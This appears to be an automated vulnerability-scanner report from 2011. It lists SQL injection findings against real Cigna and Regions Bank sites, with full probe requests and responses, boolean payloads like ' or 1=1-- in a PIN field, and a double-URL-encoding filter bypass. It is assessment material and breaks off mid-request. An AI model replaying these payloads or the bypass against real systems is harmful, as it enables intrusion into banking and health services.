14.7. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js

14.8. https://securebank.regions.com/favicon.ico

14.9. https://securebank.regions.com/images/btnContinue.gif

14.10. https://securebank.regions.com/images/equalhousing.gif

14.11. https://securebank.regions.com/images/green/rf_logo.gif

14.12. https://securebank.regions.com/images/red_arrow.gif

14.13. https://securebank.regions.com/images/spacer.gif

14.14. https://securebank.regions.com/login.aspx

14.15. https://securebank.regions.com/script/regions.js

14.16. https://securebank.regions.com/styles/styles.AmSouth.css

14.17. https://securebank.regions.com/styles/stylesprint.css

14.18. http://www.google.com/uds/solutions/slideshow/gfslideshow.js

14.19. https://www.paperg.com/post.php

14.20. http://www.placelocal.com/css/ui.all.css

14.21. http://www.placelocal.com/js/includes/jquery-ui-personalized.js

14.22. http://www.regions.com/about_regions/email_fraud.rf

14.23. http://www.regions.com/about_regions/report_fraud.rf

14.24. http://www.regions.com/personal_banking/online_security.rf

15. Private IP addresses disclosed

16. Social security numbers disclosed

16.1. http://assets.olark.com/a/assets/v0/site/4116-752-10-3079.js

16.2. http://www.placelocal.com/

16.3. http://www.placelocal.com/forgot_password.php

17. Credit card numbers disclosed

18. Robots.txt file

18.1. http://ajax.googleapis.com/ajax/services/feed/load

18.2. http://cigna.com/

18.3. http://feeds.bbci.co.uk/news/rss.xml

18.4. https://my.cigna.com/web/public/guest

18.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

18.6. http://themes.googleusercontent.com/image

18.7. http://www.blogger.com/dyn-css/authorization.css

18.8. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html

18.9. http://www.frontrowusa.com/

18.10. http://www.google-analytics.com/__utm.gif

18.11. http://www.placelocal.com/forgot_password.php

18.12. http://www.regions.com/

18.13. https://www.regions.com/personal_banking.rf

19. Cacheable HTTPS response

19.1. https://cignaforhcp.cigna.com/

19.2. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

19.3. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css

19.4. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

19.5. https://my.cigna.com/

19.6. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

19.7. https://my.cigna.com/web/public/guest

19.8. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

19.9. https://sso.corp.cigna.com/corp/sso/professional/controller

19.10. https://www.paperg.com/privacy.htm

19.11. https://wwwa.applyonlinenow.com/USCCapp/static/error.html

20. Multiple content types specified

21. HTML does not specify charset

21.1. http://cigna.com/sites/toolkit/managers_disability/home.htm

21.2. http://cigna.com/sites/toolkit/managers_disability/return/index.htm

21.3. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm

21.4. http://cigna.com/sites/toolkit/physicians_disability/index.htm

21.5. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

21.6. https://secureapps.regions.com/

21.7. https://sso.corp.cigna.com/

21.8. http://www.paperg.com/jsfb/embed.php

21.9. http://www.paperg.com/sitemap.php

21.10. http://www.paperg.com/sitemap/albany-times-union/1552.html

21.11. http://www.paperg.com/sitemap/app.com/1992.html

21.12. http://www.paperg.com/sitemap/arizona-daily-star/2955.html

21.13. http://www.paperg.com/sitemap/arizona-daily-sun/3027.html

21.14. http://www.paperg.com/sitemap/bay-area-parent---east-bay/88.html

21.15. http://www.paperg.com/sitemap/bay-area-parent---san-francisco/186.html

21.16. http://www.paperg.com/sitemap/bay-area-parent---silicon-valley/182.html

21.17. http://www.paperg.com/sitemap/bay-state-banner/59.html

21.18. http://www.paperg.com/sitemap/billings-gazette---billings-gazette/2701.html

21.19. http://www.paperg.com/sitemap/billings-gazette---thrifty-nickel/3878.html

21.20. http://www.paperg.com/sitemap/birmingham-parent-magazine/2431.html

21.21. http://www.paperg.com/sitemap/bismarck-tribune/3240.html

21.22. http://www.paperg.com/sitemap/boston-blogs/116.html

21.23. http://www.placelocal.com/api.php

21.24. http://www.xsnet.com/Portals/64787/footerStuff.html

22. Content type incorrectly stated

22.1. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

22.2. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css

22.3. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

22.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

22.5. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

22.6. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

22.7. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

22.8. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

22.9. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

22.10. http://www.frontrowusa.com/favicon.ico

22.11. http://www.paperg.com/jsfb/embed.php

22.12. http://www.placelocal.com/api.php

22.13. http://xsinternational.app6.hubspot.com/salog.js.aspx

23. SSL certificate

23.1. https://cignaforhcp.cigna.com/

23.2. https://my.cigna.com/

23.3. https://secure.regionsmortgage.com/

23.4. https://secureapps.regions.com/

23.5. https://securebank.regions.com/

23.6. https://sso.corp.cigna.com/

23.7. https://www.frontrowusa.com/

23.8. https://www.paperg.com/

23.9. https://www.planservices.com/

23.10. https://www.regions.com/

23.11. https://wwwa.applyonlinenow.com/


1. SQL injection  next
There are 44 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme'; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:43:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 89
$wsep:
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 89

Error 500: Filter [ServletRequestUserContextIntegrationFilter]: could not be initialized

Request 2

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme''; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...

Response 2

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:43:08 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000qHvYotF4MwXBdcIgBrutYk0:15ngp3rho; Path=/
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 821 bytes in 1ms.

</body>
</html>
1.2. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PageLoadMilliSecs XML attribute]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The PageLoadMilliSecs XML attribute appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PageLoadMilliSecs XML attribute, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PageLoadMilliSecs XML attribute as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
<Info PageLoadMilliSecs="52340%2527" Version="2010.12.22.1" TimezoneOffset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2"
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:35:43 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 89
$wsep:
Content-Length: 89

Error 500: Filter [ServletRequestUserContextIntegrationFilter]: could not be initialized

Request 2

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
<Info PageLoadMilliSecs="52340%2527%2527" Version="2010.12.22.1" TimezoneOffset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2"
...[SNIP]...

Response 2

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:35:44 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000O0GZYYfgJn585aj74wuL-Tq:15ngp3vj1; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 831 bytes in 0ms.

</body>
</html>
1.3. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [Plugins XML attribute]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The Plugins XML attribute appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Plugins XML attribute, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Plugins XML attribute as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...
Offset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" Images="9" Links="30" Plugins="1%2527" />
<Window WindowHref="https%3A//my.cigna.com/web/public/guest" WindowProtocol="https:" WindowHost="my.cigna.com" WindowHostName="my.cigna.com" WindowPathName="/web/public/guest" ClientSize="902x
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:39:06 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 89
$wsep:
Content-Length: 89

Error 500: Filter [ServletRequestUserContextIntegrationFilter]: could not be initialized

Request 2

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...
Offset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" Images="9" Links="30" Plugins="1%2527%2527" />
<Window WindowHref="https%3A//my.cigna.com/web/public/guest" WindowProtocol="https:" WindowHost="my.cigna.com" WindowHostName="my.cigna.com" WindowPathName="/web/public/guest" ClientSize="902x
...[SNIP]...

Response 2

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:39:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=00002szmChJl74C1QfR0t9jWnDT:15ngp45tc; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 831 bytes in 1ms.

</body>
</html>
1.4. https://secureapps.regions.com/oao/app01.aspx [ctl00%24ContentPlaceHolder1%24txtPin parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secureapps.regions.com
Path:   /oao/app01.aspx

Issue detail

The ctl00%24ContentPlaceHolder1%24txtPin parameter appears to be vulnerable to SQL injection attacks. The payloads 15752462'%20or%201%3d1--%20 and 15752462'%20or%201%3d2--%20 were each submitted in the ctl00%24ContentPlaceHolder1%24txtPin parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /oao/app01.aspx?type=lifegreensavings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
Origin: https://secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192
Content-Length: 3109

__EVENTTARGET=&__EVENTARGUMENT=&DES_Group=FORMINPUT&__VIEWSTATE=xHIh9vjHCP7V7FlwYd0dybomkcrXFi85zGyDNyxO4%2FVfU4gFk56iSPraFK2Fb5m%2FVmSSQkqJSJ9Sd9dg4uCnywmz5oW6bxAuLaWjTNif0yED1YLSSBrlZTehbSWX1peYLbbL
...[SNIP]...
ntPlaceHolder1%24txtATMCheck1=&ctl00%24ContentPlaceHolder1%24txtATMCheck2=&ctl00%24ContentPlaceHolder1%24txtATMCheck3=&ctl00%24ContentPlaceHolder1%24txtATMCheck4=&ctl00%24ContentPlaceHolder1%24txtPin=15752462'%20or%201%3d1--%20&ctl00%24ContentPlaceHolder1%24txtExpirationDate=&ctl00%24ContentPlaceHolder1%24txtCDV=&ctl00%24ContentPlaceHolder1%24btnGetting_StartedContinue.x=30&ctl00%24ContentPlaceHolder1%24btnGetting_StartedCo
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:24:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 10137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
STATE" id="__VIEWSTATE" value="ejI4XQ0S2loR+l0OfQ1EdYDWVJyr/6vzrIlcFy6iv8O0PXGX0SJfs2E9T7qPj3oS7yMo1fQ3FY1vVGgKbmM9qWeuCfRzvDvha896+i9Q7z+smQNa1zqYtlVwyXOyAhr/EmQZox2KsV02il8iDBCYlzXhyE4KFOtRfKPiQBsp8zA3sZUOZ+/OgG6twsfu23rD+gW4NPop1RPSdcFbhwcTSgPeVBUJ/folrEex+d+vcQOm59Y/FHY88pGfL0Qy5CS/nevKK2MnoS3P6KQX7KZW9w+D2O9En1e7+UCnBRMhRSNpJrXGuWCsCQ82ZY72cxl13MPsl6BNSLESeXF9uChAqyI/cqR9+5l4CgCzfOVj+yMv1ALZZ1cTc559vv4GoxgEteaAsn6oOd80UDh/BqVKqX/wKDWLlDkvFS58EnLKaNGahpPDsPd4iMFE7spltUOcTvczzKMm17c2kxBDWUpGM3/hIW4Ua5wPkCtk52wEGgx4mPjKqo4sGhHwoY68Sm7IAe8hYdom9u9kgGqKzQFplAhoi1AipL4xH8IAIIoPVhwzJ1gHf8erOzNXZD7ZZ9wFWMTPmUKDbcqEOFWvLsYeTVOYcBXwu6c5GRb1VfjL2w+W2A/axIlFmRR+sRtF1x23Tl9a4wHu/XfL5FU5j9v1AmDvMwc3/YFkqL7WFXCuD786o0eQ/IIcT3PS619tvBxdUfdPaOwunP7wKkUnHEHoP/GNaETqfu41w2riMmXdDybvBAKN3yhKrNv74eJzwuYC" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script type='text/javascript' src='/OAO/DESGetFiles.aspx?type=scripts&amp;version=4.0.5.5000&amp;files=0_51_54'></script>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="mM/j1zEOfB6kZtzISep0iH9URB0r1z3314846Pw1bUytvyBnguX6Ks8+yQE1+KlwZ2fXHb1aYI3H9kF279cMaw==" />
</div>
<div id="page">
<div id="mgMnuTop">
<div class="mnuTopLink">

<a title="Return to Regions.com" onclick="return HandleOnCancel();" target="_parent" href="javascript:__doPostBack('ctl00$ctl10','')">Return to Regions.com</a>
</div>
</div>
<div id="mgLogo">
<img src="https://www.regions.com/virtualMedia/img506.gif" alt="Regions Financial Corporation" />
</div>
<div id="mgBranding">
<div id="mgBrandSmall">
</div>
<div id="mgBrandLarge">
<h1 id="ctl00_h1AppTitle">Reg
...[SNIP]...

Request 2

POST /oao/app01.aspx?type=lifegreensavings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
Origin: https://secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
